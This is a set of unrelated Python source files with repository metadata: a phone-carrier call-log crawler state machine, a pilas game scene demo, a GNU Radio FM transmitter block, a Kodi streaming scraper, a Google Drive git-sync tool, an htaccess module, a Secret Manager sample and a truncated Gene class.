self.verify_type = self.crawler.get_verify_type(**self.parameters)
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
if ENV == 'prod' and self.cache_time:
self.state_flag = 'NoCrawl'
elif not self.verify_type:
self.state_flag = 'UnderCrawl'
else:
self.state_flag = 'WaitVerifyRequest'
elif code in [1, 2]:
status_code = STATUS_CODE[key]
self.state_flag = 'WaitLogin'
# if 'all_entry' in self.parameters.get('crawler', ''):
# self.state_flag = 'WaitLoginVerifyRequest'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class WaitVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(WaitVerifyRequestState, self).__init__(**kwargs)
self.next_action = 'Get{}'.format(self.verify_type)
self.set_current_state()
def execute(self, **kwargs):
targets = [self.next_action,"Login"]
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
self.parameters.update(parameters)
if not state_flag:
if "Login" == action:
self.state_flag = 'WaitVerifyRequest'
else:
if self.wait_code_get_login == True:
self.state_flag = 'WaitCode'
else:
self.state_flag = 'UnderVerifyRequest'
else:
self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(UnderVerifyRequestState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key, image_str = self.crawler.send_verify_request(**self.parameters)
time_used = int(time.time()) - start_time
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
self.state_flag = 'WaitCode'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.verify_content = image_str
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class WaitCodeState(BaseState):
def __init__(self, **kwargs):
super(WaitCodeState, self).__init__(**kwargs)
self.next_action = 'Verify'
self.set_current_state()
def execute(self, **kwargs):
send_target = 'Get{}'.format(self.verify_type)
targets = [self.next_action, send_target,'Login']
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
self.parameters.update(parameters)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
if not state_flag:
if action == send_target:
self.state_flag = 'UnderVerifyRequest'
# self.state_flag = 'WaitVerifyRequest'
elif "Login" == action:
self.state_flag = 'WaitVerifyRequest'
self.wait_code_get_login = True
else:
self.state_flag = 'UnderVerify'
else:
self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderVerifyState(BaseState):
def __init__(self, **kwargs):
super(UnderVerifyState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key = self.crawler.verify(**self.parameters)
time_used = int(time.time()) - start_time
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
self.state_flag = 'UnderCrawl'
elif code == 2:
status_code = STATUS_CODE[key]
self.state_flag = 'WaitCode'
if key in ['user_id_error', 'user_name_error']:
self.state_flag = 'Failed'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderCrawlState(BaseState):
def __init__(self, **kwargs):
super(UnderCrawlState, self).__init__(**kwargs)
self.next_action = 'Finish'
self.set_current_state()
def execute(self, **kwargs):
user_info = {}
call_log = []
phone_bill = []
missing_log_list = []
possibly_missing_list = []
missing_bill_list = []
open_date = ''
# code, key, call_log, missing_log_list, possibly_missing_list = self.crawler.crawl_call_log(**self.parameters)
# 临时修改, 以配合移动商城增加 缺页列表
start_time = int(time.time())
returns = self.crawler.crawl_call_log(**self.parameters)
if len(returns) == 5:
code, key, call_log, missing_log_list, possibly_missing_list = returns
part_missing_list = []
if len(returns) == 6:
code, key, call_log, missing_log_list, possibly_missing_list, part_missing_list = returns
status_code = STATUS_CODE[key]
# 保存call_from_set字段的内容
self.crawler.save_call_from_set()
total_missing_list = missing_log_list + possibly_missing_list
if (len(total_missing_list) == 6 or not call_log) and key == 'success':
status_code = STATUS_CODE['crawl_error']
# 只要crawl_call_log成功就算成功
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.state_flag = 'End'
state = {}
code, key, user_info = self.crawler.crawl_info(**self.parameters)
status_part = STATUS_CODE[key]
open_date = user_info.get('open_date', '')
state['state_name'] = 'crawl_info'
state['execute_status'] = status_part['status']
state['execute_message'] = status_part['message']
self.log(state=state)
code, key, phone_bill, missing_bill_list = self.crawler.crawl_phone_bill(**self.parameters)
status_part = STATUS_CODE[key]
####################账单融合#######################
bill_cache_hit_month_list=[]
bill_fusion_cost_time=0
message=''
try:
#进行账单数据融合
para_dict={'tel':self.tel,'sid':self.sid,'pad_code':'yulore',
'final_bill_logs':phone_bill,
'missing_month_list':missing_bill_list}
phone_bill, missing_bill_list, \
bill_cache_hit_month_list,bill_fusion_cost_time =bill_fusion(**para_dict)
except:
message = traceback.format_exc()
print message
pass
state['state_name'] = 'crawl_phone_bill'
state['execute_status'] = status_part['status']
state['execute_message'] = status_part['message']
missing_bill_dict = {'phone_bill_missing_month_list':missing_bill_list,'message':message}
self.log(state=state, missing_dict=missing_bill_dict)
time_used = int(time.time()) - start_time
# 处理20分钟超时问题
if time_used >= CRAWLER_TIME_OUT:
status_code = STATUS_CODE[FAILED_STATUS]
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.state_flag = 'End'
####################详单融合#######################
cache_hit_month_list=[]
fusion_cost_time=0
crawl_status=0
try:
#进行数据融合
para_dict={'tel':self.tel,'final_call_logs':call_log,
'missing_month_list':missing_log_list,
'possibly_missing_list':possibly_missing_list,
'part_missing_list':part_missing_list}
call_log, missing_log_list, \
possibly_missing_list, part_missing_list, \
cache_hit_month_list,fusion_cost_time =call_log_fusion(**para_dict)
except:
message = traceback.format_exc()
print message
pass
# 缺失列表第二次判断
total_missing_list = missing_log_list + possibly_missing_list
if (len(total_missing_list) == 6 or not call_log) :
pass
elif status_code <> STATUS_CODE['success']:
crawl_status=copy.deepcopy(status_code['status'])
status_code = STATUS_CODE['success']
# 只要crawl_call_log成功就算成功
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.state_flag = 'End'
if open_date:
time_struct = time.localtime(int(open_date))
open_date_YM = '%d%02d'%(time_struct.tm_year, time_struct.tm_mon)
# log_missing_set = sorted(set(missing_log_list + possibly_missing_list))
# bill_missing_set = sorted(set(missing_bill_list))
pattern = lambda x: [i for i in x if i > open_date_YM]
missing_log_list = pattern(missing_log_list)
possibly_missing_list = pattern(possibly_missing_list)
missing_bill_list = pattern(missing_bill_list)
save_data(self.sid, tel=self.tel, call_log=call_log, phone_bill=phone_bill,
user_info=user_info, status=status_code['status'], message=status_code['message'],
missing_log_list=missing_log_list, possibly_missing_list=possibly_missing_list,
missing_bill_list=missing_bill_list, part_missing_list=part_missing_list,
cache_hit_month_list=cache_hit_month_list,fusion_cost_time=fusion_cost_time,
crawl_status=crawl_status,bill_cache_hit_month_list=bill_cache_hit_month_list,
bill_fusion_cost_time=bill_fusion_cost_time)
call_log_missing_dict = {
'call_log_missing_month_list':missing_log_list,
'call_log_possibly_missing_month_list':possibly_missing_list,
'call_log_part_missing_list': part_missing_list,
'cache_hit_month_list':cache_hit_month_list,
'data_fusion_cost_time':fusion_cost_time,
'crawl_status':crawl_status,
'bill_cache_hit_month_list':bill_cache_hit_month_list,
'bill_fusion_cost_time':bill_fusion_cost_time
}
self.log(missing_dict=call_log_missing_dict)
class FailedState(BaseState):
def __init__(self, **kwargs):
super(FailedState, self).__init__(**kwargs)
self.next_action = 'Reset'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
save_status(self.sid, self.pre_status, self.pre_message)
self.log()
class AbortState(BaseState):
def __init__(self, **kwargs):
super(AbortState, self).__init__(**kwargs)
self.next_action = 'Finish'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
status = STATUS_CODE['user_exit']['status']
message = STATUS_CODE['user_exit']['message']
save_status(self.sid, status, message)
self.log()
class EndState(BaseState):
def __init__(self, **kwargs):
super(EndState, self).__init__(**kwargs)
self.next_action = 'Finish'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
self.log()
class NoCrawlState(BaseState):
def __init__(self, **kwargs):
super(NoCrawlState, self).__init__(**kwargs)
self.next_action = 'NoCrawlFinish'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
status = STATUS_CODE['result_exists']['status']
message = STATUS_CODE['result_exists']['message']
save_status(self.sid, status, message, cache_time=self.cache_time)
self.log()
class NoneState(BaseState):
def __init__(self, **kwargs):
super(NoneState, self).__init__(**kwargs)
self.next_action = 'Unsupported'
self.need_parameters = {
'need_full_name': 0,
'need_id_card': 0,
'need_pin_pwd': 0,
'need_sms_verify': 0,
'need_captcha_verify': 0
}
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
status = STATUS_CODE['no_supported_crawler']['status']
message = STATUS_CODE['no_supported_crawler']['message']
save_status(self.sid, status, message)
self.log()
CLASS_LIST = inspect.getmembers(sys.modules[__name__], inspect.isclass)
CLASS_DICT = {pair[0]:pair[1] for pair in CLASS_LIST}
def state_interface(**kwargs):
state_flag = kwargs.pop('state_flag')
if not state_flag:
return None
state_flag = '{}State'.format(state_flag)
return CLASS_DICT[state_flag](**kwargs)
|
Svolcano/python_exercise
|
dianhua/worker/state/standard_state.py
|
Python
|
mit
| 19,615
|
import pilas
from pilas.escena import Normal
from pilas.escena import Pausa
class EscenaDeMenu(pilas.escena.Normal):
def __init__(self):
Normal.__init__(self)
def iniciar(self):
pilas.fondos.Color(pilas.colores.negro)
pilas.actores.Texto("Bienvenidos al ejemplo de escenas apiladas.",
y=200)
opciones = [
('Cambiar a Escena 1', self.cambiar_escena_1),
('Almacenar y Cambiar a Escena 2', self.cambiar_escena_2),
('Salir', self.salir)]
self.menu = pilas.actores.Menu(opciones)
def cambiar_escena_1(self):
pilas.cambiar_escena(Escena_1())
def cambiar_escena_2(self):
pilas.almacenar_escena(Escena_2())
def salir(self):
import sys
sys.exit(0)
class Escena_1(pilas.escena.Normal):
def __init__(self):
Normal.__init__(self)
def iniciar(self):
pilas.actores.Texto("Acabas de cambiar a la Escena 1.\n\
Intenta mover la nave por la pantalla con el teclado.",
y=200)
pilas.actores.Texto("Pulsa la tecla 'ESC' para regresar al menu \n\
, la tecla '2' para ir a la Escena 2\n\n\
o la tecla 'p' para Pausar\n\n\
Si vas a la Escena 2 y regresas, la nave\n\
seguira en la misma posicion donde la dejaste.")
self.nave = pilas.actores.Nave()
self.pulsa_tecla_escape.conectar(self.ir_a_menu)
self.pulsa_tecla.conectar(self.cuando_pulsa_tecla)
def ir_a_menu(self, evento):
pilas.cambiar_escena(EscenaDeMenu())
def cuando_pulsa_tecla(self, evento):
if evento.texto == u'2':
pilas.almacenar_escena(Escena_2())
if evento.texto == u'a':
print self.actores
if evento.texto == u'p':
pilas.escena.pausar()
class Escena_2(pilas.escena.Normal):
def __init__(self):
Normal.__init__(self)
def iniciar(self):
pilas.fondos.Tarde()
pilas.actores.Texto("Acabas de cambiar a la Escena 2.", y=200)
pilas.actores.Texto("Pulsa la tecla 'ESC' para regresar a la\n\
escena anterior.")
self.pulsa_tecla_escape.conectar(self.ir_a_escena_anterior)
def ir_a_escena_anterior(self, evento):
pilas.recuperar_escena()
pilas.iniciar()
pilas.cambiar_escena(EscenaDeMenu())
pilas.ejecutar()
|
irvingprog/pilas
|
pilas/ejemplos/ejemplos/escenas/escenas_apiladas.py
|
Python
|
lgpl-3.0
| 2,369
|
#
# Copyright 2005,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
import math
from gnuradio import gr, filter
from .fm_emph import fm_preemph
from . import analog_python as analog
class nbfm_tx(gr.hier_block2):
"""
Narrow Band FM Transmitter.
Takes a single float input stream of audio samples in the range [-1,+1]
and produces a single FM modulated complex baseband output.
Args:
audio_rate: sample rate of audio stream, >= 16k (integer)
quad_rate: sample rate of output stream (integer)
tau: preemphasis time constant (default 75e-6) (float)
max_dev: maximum deviation in Hz (default 5e3) (float)
fh: high frequency at which to flatten preemphasis; < 0 means default of 0.925*quad_rate/2.0 (float)
quad_rate must be an integer multiple of audio_rate.
"""
def __init__(self, audio_rate, quad_rate, tau=75e-6, max_dev=5e3, fh=-1.0):
gr.hier_block2.__init__(self, "nbfm_tx",
gr.io_signature(1, 1, gr.sizeof_float), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
# FIXME audio_rate and quad_rate ought to be exact rationals
self._audio_rate = audio_rate = int(audio_rate)
self._quad_rate = quad_rate = int(quad_rate)
if quad_rate % audio_rate != 0:
raise ValueError("quad_rate is not an integer multiple of audio_rate")
do_interp = audio_rate != quad_rate
if do_interp:
interp_factor = int(quad_rate / audio_rate) # force integer
interp_taps = filter.optfir.low_pass(interp_factor, # gain
quad_rate, # Fs
4500, # passband cutoff
7000, # stopband cutoff
0.1, # passband ripple dB
40) # stopband atten dB
#print("len(interp_taps) =", len(interp_taps))
self.interpolator = filter.interp_fir_filter_fff (interp_factor, interp_taps)
self.preemph = fm_preemph(quad_rate, tau=tau, fh=fh)
k = 2 * math.pi * max_dev / quad_rate
self.modulator = analog.frequency_modulator_fc(k)
if do_interp:
self.connect(self, self.interpolator, self.preemph, self.modulator, self)
else:
self.connect(self, self.preemph, self.modulator, self)
def set_max_deviation(self, max_dev):
k = 2 * math.pi * max_dev / self._quad_rate
self.modulator.set_sensitivity(k)
class ctcss_gen_f(gr.hier_block2):
def __init__(self, sample_rate, tone_freq):
gr.hier_block2.__init__(self, "ctcss_gen_f",
gr.io_signature(0, 0, 0), # Input signature
gr.io_signature(1, 1, gr.sizeof_float)) # Output signature
self.plgen = analog.sig_source_f(sample_rate, analog.GR_SIN_WAVE,
tone_freq, 0.1, 0.0)
self.connect(self.plgen, self)
|
sdh11/gnuradio
|
gr-analog/python/analog/nbfm_tx.py
|
Python
|
gpl-3.0
| 3,307
|
# -*- coding: utf-8 -*-
"""
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import urllib
import urlparse
import json
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser
from resources.lib.modules import tvmaze
class source:
def __init__(self):
self.priority = 1
self.language = ['ru']
self.domains = ['filmix.me']
self.base_link = 'https://filmix.me'
self.search_link = '/engine/ajax/sphinx_search.php'
self.search_old = '/search/%s'
self.player_link = '/api/movies/player_data'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = self.__search([localtitle] + source_utils.aliases_to_array(aliases), year)
if not url and title != localtitle: url = self.__search([title] + source_utils.aliases_to_array(aliases), year)
return urllib.urlencode({'url': url}) if url else None
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = self.__search([localtvshowtitle] + source_utils.aliases_to_array(aliases), year)
if not url and tvshowtitle != localtvshowtitle: url = self.__search([tvshowtitle] + source_utils.aliases_to_array(aliases), year)
return urllib.urlencode({'url': url, 'tvdb': tvdb}) if url else None
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
data.update({'season': season, 'episode': episode})
return urllib.urlencode(data)
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return sources
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
url = data.get('url')
season = data.get('season')
episode = data.get('episode')
abs_episode = 0
if season and episode:
abs_episode = str(tvmaze.tvMaze().episodeAbsoluteNumber(data.get('tvdb'), int(season), int(episode)))
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
r = r.decode('cp1251').encode('utf-8')
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'players'}, req='data-player')
r = [(i.attrs['data-player'], dom_parser.parse_dom(i, 'a', req='href')) for i in r]
r = [(i[0], i[1][0].attrs['href']) for i in r if i[1]]
for post_id, play_url in r:
i = client.request(play_url, referer=url, output='extended')
headers = i[3]
headers.update({'Cookie': i[2].get('Set-Cookie')})
i = client.request(urlparse.urljoin(self.base_link, self.player_link), post={'post_id': post_id}, headers=headers, referer=i, XHR=True)
i = json.loads(i).get('message', {}).get('translations', {}).get('flash', {})
for title, link in i.iteritems():
try:
link = self.decode_direct_media_url(link)
if link.endswith('.txt'):
link = self.decode_direct_media_url(client.request(link))
link = json.loads(link).get('playlist', [])
link = [i.get('playlist', []) for i in link]
link = [x.get('file') for i in link for x in i if (x.get('season') == season and x.get('serieId') == episode) or (x.get('season') == '0' and x.get('serieId') == abs_episode)][0]
urls = [(source_utils.label_to_quality(q), self.format_direct_link(link, q)) for q in self.get_qualitys(link)]
urls = [{'quality': x[0], 'url': x[1]} for x in urls if x[0] in ['SD', 'HD']] # filter premium
for i in urls: sources.append({'source': 'CDN', 'quality': i['quality'], 'info': title, 'language': 'ru', 'url': i['url'], 'direct': True, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
def __search(self, titles, year):
try:
url = urlparse.urljoin(self.base_link, self.search_link)
t = [cleantitle.get(i) for i in set(titles) if i]
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
post = {'story': titles[0], 'years_ot': str(int(year) - 1), 'years_do': str(int(year) + 1)}
r = client.request(url, post=post, XHR=True)
if len(r) < 1000:
url = urlparse.urljoin(self.base_link, self.search_old % urllib.quote_plus(titles[0]))
r = client.request(url)
r = r.decode('cp1251').encode('utf-8')
r = dom_parser.parse_dom(r, 'article')
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'full'})
r = [(dom_parser.parse_dom(i, 'a', attrs={'itemprop': 'url'}, req='href'),
dom_parser.parse_dom(i, 'h3', attrs={'class': 'name'}, req='content'),
dom_parser.parse_dom(i, 'div', attrs={'class': 'origin-name'}, req='content'),
dom_parser.parse_dom(i, 'div', attrs={'class': 'year'})) for i in r]
r = [(i[0][0].attrs['href'], i[1][0].attrs['content'], i[2][0].attrs['content'], dom_parser.parse_dom(i[3], 'a', attrs={'itemprop': 'copyrightYear'})) for i in r if i[0] and i[1] and i[2]]
r = [(i[0], i[1], i[2], i[3][0].content) for i in r if i[3]]
r = [i[0] for i in r if (cleantitle.get(i[1]) in t or cleantitle.get(i[2]) in t) and i[3] in y][0]
return source_utils.strip_domain(r)
except:
return
########################
# Credits to evgen_dev #
########################
def decode_direct_media_url(self, encoded_url):
import base64
codec_a = ("l", "u", "T", "D", "Q", "H", "0", "3", "G", "1", "f", "M", "p", "U", "a", "I", "6", "k", "d", "s", "b", "W", "5", "e", "y", "=")
codec_b = ("w", "g", "i", "Z", "c", "R", "z", "v", "x", "n", "N", "2", "8", "J", "X", "t", "9", "V", "7", "4", "B", "m", "Y", "o", "L", "h")
i = 0
for a in codec_a:
b = codec_b[i]
i += 1
encoded_url = encoded_url.replace(a, '___')
encoded_url = encoded_url.replace(b, a)
encoded_url = encoded_url.replace('___', b)
return base64.b64decode(encoded_url)
def get_qualitys(self, source_link):
try:
avail_quality = re.compile("\[([^\]]+)\]", re.S).findall(source_link)[0]
return [i for i in avail_quality.split(',') if i]
except:
return '0'.split()
def format_direct_link(self, source_link, q):
regex = re.compile("\[([^\]]+)\]", re.IGNORECASE)
return regex.sub(q, source_link)
|
repotvsupertuga/repo
|
script.module.stream.tvsupertuga.addon/resources/lib/sources/ru/filmix.py
|
Python
|
gpl-2.0
| 8,036
|
import os
from core import utilities
from core import args
from core import gitLib
from core import google
from core import pathLib
class RepoLib:
"""Manages interactions of git repository in google drive"""
# CTOR
def __init__(self):
print('Google Driver Git Repository @lukegeorge, version 0.1')
self._argLib = args.Arguments()
self._pathLib = pathLib.PathLib(self._argLib)
self._gapi = None
def repoVersion(self):
print('Print the version of the repository on the drive')
repoFileName = self._pathLib.getBundleFileName()
# Try to retrieve the given repostory from the google drive store
repoMetadata = self.getGoogleApi().getRepo(repoFileName)
# Print the info
print("Current version on drive (" + self.printMetadata(repoMetadata) + ")")
def sync(self):
print('Sync local repository from google drive')
# Try to sync the local bundle file
metadata = self.trySyncLocalBundle()
gitRepoFolder = self._argLib.getGitRepoFolder()
bundleFilePath = self._pathLib.getBundleFilePath()
if utilities.nonexistentOrEmptyFolder(gitRepoFolder):
print('Folder "' + gitRepoFolder + '" null or emtpy. Try to create it ...')
# Repository not yet initialized, create the folder
utilities.createFolderIfNotExist(gitRepoFolder)
# Clone then the bundle
gitLib.cloneFromBundle(gitRepoFolder, bundleFilePath)
else:
# Folder not emtpy. Check it is a valid Git Repository
gitRepo = gitLib.GitLib(self._argLib.getGitRepoFolder())
print('Folder "' + gitRepoFolder + '" is a valid Git Repository')
# Fetch the last version
gitRepo.fetchFromBundle(bundleFilePath)
print('Sync local repository complete')
def push(self):
print('Push local repository changes to google drive')
gitRepoFolder = self._argLib.getGitRepoFolder()
repoFileName = self._pathLib.getBundleFileName()
bundleFilePath = self._pathLib.getBundleFilePath()
# Try to sync the local bundle file
metadata = self.trySyncLocalBundle()
# Get the HEAD version of the synched repo
original_head = gitLib.getBunldeHead(bundleFilePath)
print('Head of the existing bundle before bundeling: ' + original_head)
# Open the git repository
gitRepo = gitLib.GitLib(gitRepoFolder)
# Now we bundle the current repo
gitRepo.bundleRepo(bundleFilePath)
# Recalculate the head
pushed_head = gitLib.getBunldeHead(bundleFilePath)
print('Head of the existing bundle after bundeling: ' + pushed_head)
# Check the bundle has changed
if original_head == pushed_head:
# Local repository hasn't been updated, return
print('Git repo has not changed, discard bundle')
return
print('New head version, pushing to drive')
# Upload the new version
metadata = self.getGoogleApi().updateRepo(bundleFilePath, metadata[google.F_ID])
# Delete older versions
print('Deleting older drive revisions ...')
self.getGoogleApi().deleteAllRevisionButHead(metadata)
print('Older drive revisions deleted')
# Download again the bundle metadata, since the version number may be updated
metadata = gBundleFile = self.getGoogleApi().getRepo(repoFileName)
# Update the metadata
self.updateBundleMetadata(metadata, pushed_head)
print('Local metadata updated')
print('Pushing to drive complete')
def init(self):
print('Initialize a new repository on google drive')
print('If the repository is already initialized, throw an exception')
gitRepoFolder = self._argLib.getGitRepoFolder()
repoFileName = self._pathLib.getBundleFileName()
# Try to retrieve the given repostory from the google drive store
api = self.getGoogleApi()
gBundleFile = api.getRepo(repoFileName)
if gBundleFile is None:
# Open the git repository
gitRepo = gitLib.GitLib(gitRepoFolder)
# Bundle the repository
bundleFilePath = self._pathLib.getBundleFilePath()
gitRepo.bundleRepo(bundleFilePath)
# initialize the repository on google drive
print("Initializing repository '" + repoFileName + "'...")
metadata = api.createRepo(bundleFilePath, repoFileName)
print("Repository '" + repoFileName + "' initialized")
else:
raise Exception("The repository '" + repoFileName + "' already initialized on the google drive. Cannot initialize the repository")
def tryUploadNewVersion(self):
"""Upload the local bundle file to google drive"""
repoFileName = self._pathLib.getBundleFileName()
repoLocalPath = self._pathLib.getBundleFilePath()
repoMetadataPath = self._pathLib.getJsonFilePath()
# Try to retrieve the given repostory from the google drive store
gBundleFile = self.getGoogleApi().getRepo(repoFileName)
if gBundleFile is None:
raise Exception("The repository '" + repoFileName + "' does not exist on the drive")
# Upload the new version
def trySyncLocalBundle(self):
"""Sync the drive bundle file on local disk"""
repoFileName = self._pathLib.getBundleFileName()
repoLocalPath = self._pathLib.getBundleFilePath()
repoMetadataPath = self._pathLib.getJsonFilePath()
# Try to retrieve the given repostory from the google drive store
gBundleFile = self.getGoogleApi().getRepo(repoFileName)
if gBundleFile is None:
raise Exception("The repository '" + repoFileName + "' does not exist on the drive")
driveFileSize = gBundleFile[google.F_SIZE]
driveFileId = gBundleFile[google.F_ID]
print("Found repository on drive (" + self.printMetadata(gBundleFile) + ")")
# Check whether the local file exists
if os.path.isfile(repoLocalPath) and os.path.isfile(repoMetadataPath):
# load the metadata
metadata = self.readMetadata()
# Check whether the metadata refers to the bundle on the drive
if metadata[google.F_ID] != gBundleFile[google.F_ID]:
raise Exception("The repository with name '" + repoFileName +
"' found on drive doesn't match the ID of the locally stored metadata")
# Parse the versions
localVersion = int(metadata[google.F_VERSION])
driveVersion = int(gBundleFile[google.F_VERSION])
# If the repository matched the locally stored id, check if a new version is available
if driveVersion > localVersion:
# Download the new version
print("An old version is saved on disk (" +
str(localVersion) + "<" + str(driveVersion) +
"). Download the new version ...")
self.downloadBundle(gBundleFile)
else:
print("The local repository is up to date. Current version (" +
str(localVersion) + "), Drive version (" +
str(driveVersion) + ")")
else:
# Download the current drive version on disk
print("No local repository available on disk. Start download ...")
self.downloadBundle(gBundleFile)
return gBundleFile
def downloadBundle(self, gBundleFile):
"""Clear and download the bundle file into a temporary location along with its metadata"""
repoLocalPath = self._pathLib.getBundleFilePath()
# Delete existing bundle file
if os.path.exists(repoLocalPath):
os.remove(repoLocalPath)
# Local bundle file not yet downloaded
self.getGoogleApi().downloadFile(repoLocalPath, gBundleFile['id'])
# Update the metadata
self.updateBundleMetadata(gBundleFile, gitLib.getBunldeHead(repoLocalPath))
print("New version downloaded (" + self.printMetadata(gBundleFile) + ")")
def updateBundleMetadata(self, gBundleFile, head):
repoMetadataPath = self._pathLib.getJsonFilePath()
# Delete existing metadata file
if os.path.exists(repoMetadataPath):
os.remove(repoMetadataPath)
# Create json file
metadata = {
google.F_ID: gBundleFile[google.F_ID],
google.F_VERSION: gBundleFile[google.F_VERSION],
google.F_TRASHED: gBundleFile[google.F_TRASHED],
google.F_SIZE: gBundleFile[google.F_SIZE],
gitLib.FT_HEAD: head,
}
utilities.writeJson(metadata, repoMetadataPath)
def printMetadata(self, gBundleFile):
return ("ID: " + gBundleFile[google.F_ID] +
", Name: '" + gBundleFile[google.F_NAME] +
"', Version: " + gBundleFile[google.F_VERSION] +
", Size: " + gBundleFile[google.F_SIZE] +
" B (" + utilities.humansize(gBundleFile[google.F_SIZE]) + ")")
def getGoogleApi(self):
"""Return an instance of the google api object"""
if self._gapi is None:
self._gapi = google.GoogleServiceApi()
return self._gapi
def readMetadata(self):
return utilities.readJson(self._pathLib.getJsonFilePath())
|
lukegeorg/DriveGitRepo
|
core/repoLib.py
|
Python
|
gpl-3.0
| 8,256
|
# -*- coding: utf-8 -*-
##################################################################
# pyHTTPd
# $Id$
# (c) 2006 by Tim Taubert
##################################################################
import os
from xml.dom import minidom
from baseConfig import pConfig
class htaccess:
active = False
def __init__(self):
return
def before_GET(self, httpd):
htfile = self.findhtaccessFile(pConfig.getValue("base.docroot")+httpd.path)
if htfile:
parsehtaccessFile(self, htfile)
active = True
def findhtaccessFile(self, path):
if not os.path.isdir(path) or path.endswith("/"):
path = "/".join(path.split("/")[:-1])
while os.path.isdir(path):
if os.path.isfile(path+"/.htaccess"):
return path+"/.htaccess"
path = "/".join(path.split("/")[:-1])
return False
def parsehtaccessFile(self, htfile):
xmldoc = minidom.parse(htfile)
xmldoc = xmldoc.getElementsByTagName("config")[0]
|
BackupTheBerlios/pyhttpd-svn
|
core/modules/htaccess/htaccess.py
|
Python
|
gpl-2.0
| 922
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DisableSecretVersion
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-secretmanager
# [START secretmanager_v1_generated_SecretManagerService_DisableSecretVersion_async]
from google.cloud import secretmanager_v1
async def sample_disable_secret_version():
# Create a client
client = secretmanager_v1.SecretManagerServiceAsyncClient()
# Initialize request argument(s)
request = secretmanager_v1.DisableSecretVersionRequest(
name="name_value",
)
# Make the request
response = await client.disable_secret_version(request=request)
# Handle the response
print(response)
# [END secretmanager_v1_generated_SecretManagerService_DisableSecretVersion_async]
|
googleapis/python-secret-manager
|
samples/generated_samples/secretmanager_v1_generated_secret_manager_service_disable_secret_version_async.py
|
Python
|
apache-2.0
| 1,560
|
Class Gene:
def __init__(self, name, system, loner, profile):
self.name = name
self.profile = profile
self._system = system
self._loner = loner
@property
def system(self):
"""
:return: the System that owns this Gene
:rtype: :class:`macsypy.system.System` object
"""
return self._system
def __eq__(self, gene):
"""
:return: True if the gene names (gene.name) are the same, False otherwise.
:param gene: the query of the test
